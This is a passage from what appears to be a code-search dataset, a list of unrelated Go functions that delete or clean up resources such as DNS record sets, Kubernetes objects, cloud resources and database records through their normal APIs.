impl.TemplateImpl.NewEntityCollection()\n\t\tc = impl.TemplateImpl.GetConnection()\n\t\ttables = impl.TemplateImpl.NewEntity().Tables()\n\t\tdeletedSSG = make([]base.ModelInterface, 0)\n\t\tdeletedSSGEntity = make([]entity.ServerServerGroup, 0)\n\t)\n\n\t// We need transaction to ensure the total and the query count is consistent.\n\ttx := c.Begin()\n\tif err := tx.Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete collection failed, start transaction failed.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\n\tif err := tx.Find(recordCollection).Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete collection failed, find resource failed.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\tfor _, v := range tables {\n\t\tif err := tx.Delete(v).Error; err != nil {\n\t\t\ttx.Rollback()\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"resource\": name,\n\t\t\t\t\"error\": err,\n\t\t\t}).Warn(\"DB delete collection failed, delete resources failed, transaction rollback.\")\n\t\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t\t}\n\t}\n\t// When we delete all the servers we also need delete all the server-servergroup.\n\tif err := tx.Find(&deletedSSGEntity).Error; err != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete resource failed, record server-servergroup association failed, transaction rollback.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\tfor _, each := range deletedSSGEntity {\n\t\tdeletedSSG = append(deletedSSG, each.ToModel())\n\t}\n\tif err := tx.Delete(entity.ServerServerGroup{}).Error; err != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"error\": err}).\n\t\t\tWarn(\"Delete server collection in DB failed, delete server-servergroup collection failed, transaction rollback.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\tret, errorResp := impl.TemplateImpl.ConvertFindResultToModel(recordCollection)\n\tif errorResp != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"errorResp\": errorResp.ID,\n\t\t}).Warn(\"DB delete collection failed, convert find result failed, transaction rollback.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\tif err := tx.Commit().Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete collection failed, commit failed.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\treturn ret, deletedSSG, nil\n}", "func DeleteResources(f *os.File, cfg *rest.Config, dynamicClient dynamic.Interface, waitForDeletion bool) error {\n\tdeletionPropagation := metav1.DeletePropagationForeground\n\tgracePeriodSeconds := int64(0)\n\n\tdecoder, mapper, err := parseObjects(f, cfg)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor {\n\t\tresource, unstructuredObj, err := getResource(decoder, mapper, dynamicClient)\n\t\tif err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\tif err := resource.Delete(context.Background(), unstructuredObj.GetName(),\n\t\t\tmetav1.DeleteOptions{GracePeriodSeconds: &gracePeriodSeconds,\n\t\t\t\tPropagationPolicy: &deletionPropagation}); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif waitForDeletion {\n\t\t// verify deleted\n\t\tdecoder, mapper, err := parseObjects(f, cfg)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tfor {\n\t\t\tresource, unstructuredObj, err := getResource(decoder, mapper, dynamicClient)\n\t\t\tif err != nil {\n\t\t\t\tif err == io.EOF {\n\t\t\t\t\tbreak\n\t\t\t\t} else {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tfmt.Fprintln(ginkgo.GinkgoWriter, \"wait for deletion\", unstructuredObj.GetName())\n\t\t\tif err := wait.Poll(time.Second*5, time.Second*10, func() (done bool, err error) {\n\t\t\t\tobj, err := resource.Get(context.Background(), unstructuredObj.GetName(), metav1.GetOptions{})\n\n\t\t\t\tif err == nil {\n\t\t\t\t\tfmt.Fprintln(ginkgo.GinkgoWriter, \"remove finalizers\", obj.GetFinalizers(), unstructuredObj.GetName())\n\t\t\t\t\tobj.SetFinalizers(nil)\n\t\t\t\t\t_, err = resource.Update(context.Background(), obj, metav1.UpdateOptions{})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn false, err\n\t\t\t\t\t}\n\t\t\t\t\treturn false, nil\n\t\t\t\t}\n\t\t\t\tif apierrors.IsNotFound(err) {\n\t\t\t\t\treturn true, nil\n\t\t\t\t}\n\t\t\t\treturn false, err\n\t\t\t}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (s *dnsRecordSetLister) DnsRecordSets(namespace string) DnsRecordSetNamespaceLister {\n\treturn dnsRecordSetNamespaceLister{indexer: s.indexer, namespace: namespace}\n}", "func (p *AWSProvider) Records(zone string) ([]*endpoint.Endpoint, error) {\n\tendpoints := []*endpoint.Endpoint{}\n\n\tf := func(resp *route53.ListResourceRecordSetsOutput, lastPage bool) (shouldContinue bool) {\n\t\tfor _, r := range resp.ResourceRecordSets {\n\t\t\t// TODO(linki, ownership): Remove once ownership system is in place.\n\t\t\t// See: https://github.com/kubernetes-incubator/external-dns/pull/122/files/74e2c3d3e237411e619aefc5aab694742001cdec#r109863370\n\t\t\tswitch aws.StringValue(r.Type) {\n\t\t\tcase route53.RRTypeA, route53.RRTypeCname, route53.RRTypeTxt:\n\t\t\t\tbreak\n\t\t\tdefault:\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfor _, rr := range r.ResourceRecords {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(rr.Value), aws.StringValue(r.Type)))\n\t\t\t}\n\n\t\t\tif r.AliasTarget != nil {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(r.AliasTarget.DNSName), \"ALIAS\"))\n\t\t\t}\n\t\t}\n\n\t\treturn true\n\t}\n\n\tparams := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(expandedHostedZoneID(zone)),\n\t}\n\n\tif err := p.Client.ListResourceRecordSetsPages(params, f); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn endpoints, nil\n}", "func (client DnsClient) deleteDomainRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodDelete, \"/zones/{zoneNameOrId}/records/{domain}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response DeleteDomainRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func ExampleAvailabilitySetsClient_Delete_availabilitySetDeleteMinimumSetGen() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcompute.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\t_, err = clientFactory.NewAvailabilitySetsClient().Delete(ctx, \"rgcompute\", \"aaaaaaaaaaa\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n}", "func (j *TrainingJob) deleteResources() error {\n\tfor _, r := range j.Replicas {\n\t\tif err := r.Delete(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func NewResourceRecordSet(ctx *pulumi.Context,\n\tname string, args *ResourceRecordSetArgs, opts ...pulumi.ResourceOption) (*ResourceRecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"managedZone\",\n\t\t\"project\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource ResourceRecordSet\n\terr := ctx.RegisterResource(\"google-native:dns/v1beta2:ResourceRecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (client ReferenceDataSetsClient) Delete(ctx context.Context, resourceGroupName string, environmentName string, referenceDataSetName string) (result autorest.Response, err error) {\n\tif tracing.IsEnabled() {\n\t\tctx = tracing.StartSpan(ctx, fqdn+\"/ReferenceDataSetsClient.Delete\")\n\t\tdefer func() {\n\t\t\tsc := -1\n\t\t\tif result.Response != nil {\n\t\t\t\tsc = result.Response.StatusCode\n\t\t\t}\n\t\t\ttracing.EndSpan(ctx, sc, err)\n\t\t}()\n\t}\n\treq, err := client.DeletePreparer(ctx, resourceGroupName, environmentName, referenceDataSetName)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"timeseriesinsights.ReferenceDataSetsClient\", \"Delete\", nil, \"Failure preparing request\")\n\t\treturn\n\t}\n\n\tresp, err := client.DeleteSender(req)\n\tif err != nil {\n\t\tresult.Response = resp\n\t\terr = autorest.NewErrorWithError(err, \"timeseriesinsights.ReferenceDataSetsClient\", \"Delete\", resp, \"Failure sending request\")\n\t\treturn\n\t}\n\n\tresult, err = client.DeleteResponder(resp)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"timeseriesinsights.ReferenceDataSetsClient\", \"Delete\", resp, \"Failure responding to request\")\n\t\treturn\n\t}\n\n\treturn\n}", "func (c *Client) DeleteCrmStages(ids []int64) error {\n\treturn c.Delete(CrmStageModel, ids)\n}", "func (rcsw *RemoteClusterServiceWatcher) cleanupMirroredResources() error {\n\tmatchLabels := map[string]string{\n\t\tconsts.MirroredResourceLabel: \"true\",\n\t\tconsts.RemoteClusterNameLabel: rcsw.clusterName,\n\t}\n\n\tservices, err := rcsw.localAPIClient.Svc().Lister().List(labels.Set(matchLabels).AsSelector())\n\tif err != nil {\n\t\tinnerErr := fmt.Errorf(\"could not retrieve mirrored services that need cleaning up: %s\", err)\n\t\tif kerrors.IsNotFound(err) {\n\t\t\treturn innerErr\n\t\t}\n\t\t// if its not notFound then something else went wrong, so we can retry\n\t\treturn RetryableError{[]error{innerErr}}\n\t}\n\n\tvar errors []error\n\tfor _, svc := range services {\n\t\tif err := rcsw.localAPIClient.Client.CoreV1().Services(svc.Namespace).Delete(svc.Name, &metav1.DeleteOptions{}); err != nil {\n\t\t\tif kerrors.IsNotFound(err) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\terrors = append(errors, fmt.Errorf(\"Could not delete service %s/%s: %s\", svc.Namespace, svc.Name, err))\n\t\t} else {\n\t\t\trcsw.log.Debugf(\"Deleted service %s/%s\", svc.Namespace, svc.Name)\n\t\t}\n\t}\n\n\tendpoints, err := rcsw.localAPIClient.Endpoint().Lister().List(labels.Set(matchLabels).AsSelector())\n\tif err != nil {\n\t\tinnerErr := fmt.Errorf(\"could not retrieve Endpoints that need cleaning up: %s\", err)\n\t\tif kerrors.IsNotFound(err) {\n\t\t\treturn innerErr\n\t\t}\n\t\treturn RetryableError{[]error{innerErr}}\n\t}\n\n\tfor _, endpt := range endpoints {\n\t\tif err := rcsw.localAPIClient.Client.CoreV1().Endpoints(endpt.Namespace).Delete(endpt.Name, &metav1.DeleteOptions{}); err != nil {\n\t\t\tif kerrors.IsNotFound(err) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\terrors = append(errors, fmt.Errorf(\"Could not delete Endpoints %s/%s: %s\", endpt.Namespace, endpt.Name, err))\n\t\t} else {\n\t\t\trcsw.log.Debugf(\"Deleted Endpoints %s/%s\", endpt.Namespace, endpt.Name)\n\t\t}\n\t}\n\n\tif len(errors) > 0 {\n\t\treturn RetryableError{errors}\n\t}\n\treturn nil\n}", "func (r *ReconcileGitTrack) deleteResources(leftovers map[string]farosv1alpha1.GitTrackObjectInterface) error {\n\tif len(leftovers) > 0 {\n\t\tr.log.V(0).Info(\"Found leftover resources to clean up\", \"leftover resources\", string(len(leftovers)))\n\t}\n\tfor name, obj := range leftovers {\n\t\tif err := r.Delete(context.TODO(), obj); err != nil {\n\t\t\treturn fmt.Errorf(\"failed to delete child for '%s': '%s'\", name, err)\n\t\t}\n\t\tr.log.V(0).Info(\"Child deleted\", \"child name\", name)\n\t}\n\treturn nil\n}", "func (mdb *db) DeleteFromSignalsRequestedSets(\n\tctx context.Context,\n\tfilter sqlplugin.SignalsRequestedSetsFilter,\n) (sql.Result, error) {\n\tquery, args, err := sqlx.In(\n\t\tdeleteSignalsRequestedSetQry,\n\t\tfilter.ShardID,\n\t\tfilter.NamespaceID,\n\t\tfilter.WorkflowID,\n\t\tfilter.RunID,\n\t\tfilter.SignalIDs,\n\t)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn mdb.conn.ExecContext(ctx,\n\t\tmdb.conn.Rebind(query),\n\t\targs...,\n\t)\n}", "func DeleteRecord(d *schema.ResourceData, meta interface{}) error {\n\tlog.Printf(\"[DEBUG] Entering DeleteRecord\")\n\tvar err error\n\tvar activeVersion int64\n\tclient := getRecordClient(meta)\n\n\tvar zr ZoneRecord\n\tzr.Parse(d)\n\tif zr.Version == 0 {\n\t\tlog.Printf(\"[DEBUG] Looking for active zone version\")\n\t\tversion := getZoneVersionClient(meta)\n\t\t_, activeVersion, err = getActiveZoneVersion(meta, zr.Zone)\n\t\tnewZoneVersion, err := createZoneVersion(version, zr.Zone, activeVersion, 0)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Could not create new version for record: %v\", err)\n\t\t}\n\t\t_, zr.Version = resourceIDSplit(newZoneVersion, \"_\")\n\t\t// ID needs to also be updated.\n\t\trecords, err := client.List(zr.Zone, zr.Version)\n\t\tfor _, r := range records {\n\t\t\tif r.Name == zr.Name && r.Type == zr.Type && r.Value == zr.Value {\n\t\t\t\tzr.Id = r.Id\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\n\tlog.Printf(\"[DEBUG] Deleting record: %v\", zr.Id)\n\tsuccess, err := client.Delete(zr.Zone, zr.Version, zr.Id)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Cannot delete record: %v\", err)\n\t}\n\n\tif success {\n\t\tlog.Printf(\"[DEBUG] Deleted record: %v\", zr.Id)\n\t\td.SetId(\"\")\n\t} else {\n\t\tlog.Printf(\"[DEBUG] Failure Deleting record: %v %#v\", zr.Id, err)\n\t}\n\tlog.Printf(\"[INFO] Active zone version: %v New Zone Version: %v\", activeVersion, zr.Version)\n\tif activeVersion != 0 {\n\t\tsetActiveZoneVersion(meta, zr.Zone, zr.Version)\n\t}\n\n\treturn err\n}", "func (d *DNS) GetResourceRecordSet(projectID string, managedZone string, name string) (*v1.ResourceRecordSet, error) {\n\tctx := context.Background()\n\trrsService := v1.NewResourceRecordSetsService(d.V1)\n\trrsListCall := rrsService.List(projectID, managedZone).Context(ctx).Name(name)\n\trrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif len(rrsList.Rrsets) == 0 {\n\t\treturn nil, nil\n\t}\n\treturn rrsList.Rrsets[0], nil\n}", "func TestDeleteSet(t *testing.T) {\n\ttests.ResetLog()\n\tdefer tests.DisplayLog()\n\n\tqsName := prefix + \"_basic\"\n\tqsBadName := prefix + \"_basic_advice\"\n\n\tconst fixture = \"basic.json\"\n\tset1, err := qfix.Get(fixture)\n\tif err != nil {\n\t\tt.Fatalf(\"\\t%s\\tShould load query record from file : %v\", tests.Failed, err)\n\t}\n\tt.Logf(\"\\t%s\\tShould load query record from file.\", tests.Success)\n\n\tdb, err := db.NewMGO(tests.Context, tests.TestSession)\n\tif err != nil {\n\t\tt.Fatalf(\"\\t%s\\tShould be able to get a Mongo session : %v\", tests.Failed, err)\n\t}\n\tdefer db.CloseMGO(tests.Context)\n\n\tdefer func() {\n\t\tif err := qfix.Remove(db, prefix); err != nil {\n\t\t\tt.Fatalf(\"\\t%s\\tShould be able to remove the query set : %v\", tests.Failed, err)\n\t\t}\n\t\tt.Logf(\"\\t%s\\tShould be able to remove the query set.\", tests.Success)\n\t}()\n\n\tt.Log(\"Given the need to delete a query set in the database.\")\n\t{\n\t\tt.Log(\"\\tWhen using fixture\", fixture)\n\t\t{\n\t\t\tif err := query.Upsert(tests.Context, db, set1); err != nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould be able to create a query set : %s\", tests.Failed, err)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould be able to create a query set.\", tests.Success)\n\n\t\t\tif err := query.Delete(tests.Context, db, qsName); err != nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould be able to delete a query set using its name[%s]: %s\", tests.Failed, qsName, err)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould be able to delete a query set using its name[%s]:\", tests.Success, qsName)\n\n\t\t\tif err := query.Delete(tests.Context, db, qsBadName); err == nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould not be able to delete a query set using wrong name name[%s]\", tests.Failed, qsBadName)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould not be able to delete a query set using wrong name name[%s]\", tests.Success, qsBadName)\n\n\t\t\tif _, err := query.GetByName(tests.Context, db, qsName); err == nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould be able to validate query set with Name[%s] does not exists: %s\", tests.Failed, qsName, errors.New(\"Record Exists\"))\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould be able to validate query set with Name[%s] does not exists:\", tests.Success, qsName)\n\t\t}\n\t}\n}", "func (rest *RestAPI) UnloadResources() {\n}", "func (client DnsClient) DeleteRRSet(ctx context.Context, request DeleteRRSetRequest) (response DeleteRRSetResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.deleteRRSet, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = DeleteRRSetResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = DeleteRRSetResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(DeleteRRSetResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into DeleteRRSetResponse\")\n\t}\n\treturn\n}", "func (c *resourceCache) DeleteResources(resources []NamedProtoMessage) {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\n\tfor _, r := range resources {\n\t\tname := GetResourceName(r)\n\t\tif _, ok := c.cache[name]; ok {\n\t\t\tdelete(c.cache, name)\n\t\t}\n\t}\n}", "func (f *TestFramework) DestroyMachineSet() error {\n\tlog.Print(\"Destroying MachineSets\")\n\tif f.machineSet == nil {\n\t\tlog.Print(\"unable to find MachineSet to be deleted, was skip VM setup option selected ?\")\n\t\tlog.Print(\"MachineSets/Machines needs to be deleted manually \\nNot deleting MachineSets...\")\n\t\treturn nil\n\t}\n\terr := f.machineClient.MachineSets(\"openshift-machine-api\").Delete(context.TODO(), f.machineSet.Name, metav1.DeleteOptions{})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"unable to delete MachineSet %v\", err)\n\t}\n\tlog.Print(\"MachineSets Destroyed\")\n\treturn nil\n}", "func resourceIBMDNSREVERSERecordDelete(d *schema.ResourceData, meta interface{}) error {\n\tsess := meta.(conns.ClientSession).SoftLayerSession()\n\tservice := services.GetDnsDomainResourceRecordService(sess)\n\tid, err := strconv.Atoi(d.Id())\n\tif err != nil {\n\t\treturn fmt.Errorf(\"[ERROR] Not a valid ID, must be an integer: %s\", err)\n\t}\n\t_, err = service.Id(id).DeleteObject()\n\n\tif err != nil {\n\t\treturn fmt.Errorf(\"[ERROR] Error deleting DNS Reverse Record: %s\", err)\n\t}\n\treturn nil\n}", "func (c *quarksStatefulSets) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {\n\treturn c.client.Delete().\n\t\tNamespace(c.ns).\n\t\tResource(\"quarksstatefulsets\").\n\t\tName(name).\n\t\tBody(&opts).\n\t\tDo(ctx).\n\t\tError()\n}", "func (impl *Server) DeleteServer(id string) (base.ModelInterface, []base.ModelInterface, *base.ErrorResponse) {\n\tvar (\n\t\tname = impl.ResourceName()\n\t\trecord = new(entity.Server)\n\t\tprevious = new(entity.Server)\n\t\tdeletedSSG = make([]base.ModelInterface, 0)\n\t\tdeletedSSGEntity = make([]entity.ServerServerGroup, 0)\n\t\tc = impl.GetConnection()\n\t)\n\n\ttx := c.Begin()\n\tif err := tx.Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"id\": id,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete resource failed, start transaction failed.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\texist, err := impl.GetInternal(tx, id, previous)\n\tif !exist {\n\t\ttx.Rollback()\n\t\treturn nil, nil, base.NewErrorResponseNotExist()\n\t}\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\n\trecord.SetID(id)\n\tfor _, v := range record.Association() {\n\t\tif err := tx.Delete(v).Error; err != nil {\n\t\t\ttx.Rollback()\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"resource\": name,\n\t\t\t\t\"id\": id,\n\t\t\t\t\"error\": err,\n\t\t\t}).Warn(\"DB delete resource failed, delete association failed, transaction rollback.\")\n\t\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t\t}\n\t}\n\tif err := tx.Delete(record).Error; err != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"id\": id,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete resource failed, delete resource failed, transaction rollback.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\n\t// Delete the server-servergroup association.\n\t// But we need record them first.\n\tif err := tx.Where(\"\\\"ServerID\\\" = ?\", id).Find(&deletedSSGEntity).Error; err != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"id\": id,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete resource failed, record server-servergroup association failed, transaction rollback.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\tfor _, each := range deletedSSGEntity {\n\t\tdeletedSSG = append(deletedSSG, each.ToModel())\n\t}\n\tif err := tx.Where(\"\\\"ServerID\\\" = ?\", id).Delete(entity.ServerServerGroup{}).Error; err != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"id\": id,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete resource failed, delete server-servergroup association failed, transaction rollback.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\n\tif err := tx.Commit().Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"id\": id,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"DB delete resource failed, commit failed.\")\n\t\treturn nil, nil, base.NewErrorResponseTransactionError()\n\t}\n\treturn previous.ToModel(), deletedSSG, nil\n}", "func NewClearDNSZoneRecordsRequest(server string, dnsZone string) (*http.Request, error) {\n\tvar err error\n\n\tvar pathParam0 string\n\n\tpathParam0, err = runtime.StyleParam(\"simple\", false, \"dns_zone\", dnsZone)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tqueryUrl, err := url.Parse(server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbasePath := fmt.Sprintf(\"/domain/v2alpha2/dns-zones/%s/records\", pathParam0)\n\tif basePath[0] == '/' {\n\t\tbasePath = basePath[1:]\n\t}\n\n\tqueryUrl, err = queryUrl.Parse(basePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq, err := http.NewRequest(\"DELETE\", queryUrl.String(), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn req, nil\n}", "func (a *Agent) RemoveResources(releaseName string) error {\n\t// Remove CassandraDatacenter (cass-operator should delete all the finalizers and associated resources)\n\tif err := a.removeCassandraDatacenter(releaseName); err != nil {\n\t\tlog.Fatalf(\"Failed to remove Cassandra cluster(s): %v\", err)\n\t\treturn err\n\t}\n\treturn nil\n}", "func (a *Agent) RemoveResources(releaseName string) error {\n\t// Remove CassandraDatacenter (cass-operator should delete all the finalizers and associated resources)\n\tif err := a.removeCassandraDatacenter(releaseName); err != nil {\n\t\tlog.Fatalf(\"Failed to remove Cassandra cluster(s): %v\", err)\n\t\treturn err\n\t}\n\treturn nil\n}", "func (client *Client) DeleteResourceInstances(request *DeleteResourceInstancesRequest) (response *DeleteResourceInstancesResponse, err error) {\n\tresponse = CreateDeleteResourceInstancesResponse()\n\terr = client.DoAction(request, response)\n\treturn\n}", "func (r *ReconcileStatefulSetCleanup) deleteVolumeManagementStatefulSet(ctx context.Context, extendedstatefulset *essv1a1.ExtendedStatefulSet) error {\n\n\tstatefulSets, err := listStatefulSetsFromInformer(ctx, r.client, extendedstatefulset)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor index := range statefulSets {\n\t\tif isVolumeManagementStatefulSet(statefulSets[index].Name) {\n\t\t\tok, err := r.isVolumeManagementStatefulSetInitialized(ctx, &statefulSets[index])\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif ok {\n\t\t\t\tctxlog.Info(ctx, \"Deleting volumeManagement statefulSet \", statefulSets[index].Name, \" owned by ExtendedStatefulSet \", extendedstatefulset.Name, \" in namespace \", extendedstatefulset.Namespace, \".\")\n\t\t\t\terr = r.client.Delete(ctx, &statefulSets[index], client.PropagationPolicy(metav1.DeletePropagationBackground))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func testAccCheckDNSManagedZoneDestroyProducerFramework(t *testing.T) func(s *terraform.State) error {\n\treturn func(s *terraform.State) error {\n\t\tfor name, rs := range s.RootModule().Resources {\n\t\t\tif rs.Type != \"google_dns_managed_zone\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif strings.HasPrefix(name, \"data.\") {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tp := acctest.GetFwTestProvider(t)\n\n\t\t\turl, err := acctest.ReplaceVarsForFrameworkTest(&p.FrameworkProvider.FrameworkProviderConfig, rs, \"{{DNSBasePath}}projects/{{project}}/managedZones/{{name}}\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tbillingProject := \"\"\n\n\t\t\tif !p.BillingProject.IsNull() && p.BillingProject.String() != \"\" {\n\t\t\t\tbillingProject = p.BillingProject.String()\n\t\t\t}\n\n\t\t\t_, diags := fwtransport.SendFrameworkRequest(&p.FrameworkProvider.FrameworkProviderConfig, \"GET\", billingProject, url, p.UserAgent, nil)\n\t\t\tif !diags.HasError() {\n\t\t\t\treturn fmt.Errorf(\"DNSManagedZone still exists at %s\", url)\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n}", "func (c *Canary) CleanPreviousCanaryResources(region schemas.RegionConfig, completeCanary bool) error {\n\tclient, err := selectClientFromList(c.AWSClients, region.Region)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tprefix := tool.BuildPrefixName(c.AwsConfig.Name, c.Stack.Env, region.Region)\n\n\tasgList, err := client.EC2Service.GetAllMatchingAutoscalingGroupsWithPrefix(prefix)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, asg := range asgList {\n\t\tif (completeCanary && *asg.AutoScalingGroupName == c.LatestAsg[region.Region]) || !tool.IsStringInArray(*asg.AutoScalingGroupName, c.PrevAsgs[region.Region]) {\n\t\t\tcontinue\n\t\t}\n\n\t\tc.Logger.Debugf(\"[Resizing] target autoscaling group : %s\", *asg.AutoScalingGroupName)\n\t\tif err := c.ResizingAutoScalingGroupCount(client, *asg.AutoScalingGroupName, 0); err != nil {\n\t\t\tc.Logger.Errorf(err.Error())\n\t\t}\n\t\tc.Logger.Debugf(\"Resizing autoscaling group finished: %s\", *asg.AutoScalingGroupName)\n\n\t\tfor _, tg := range asg.TargetGroupARNs {\n\t\t\tif 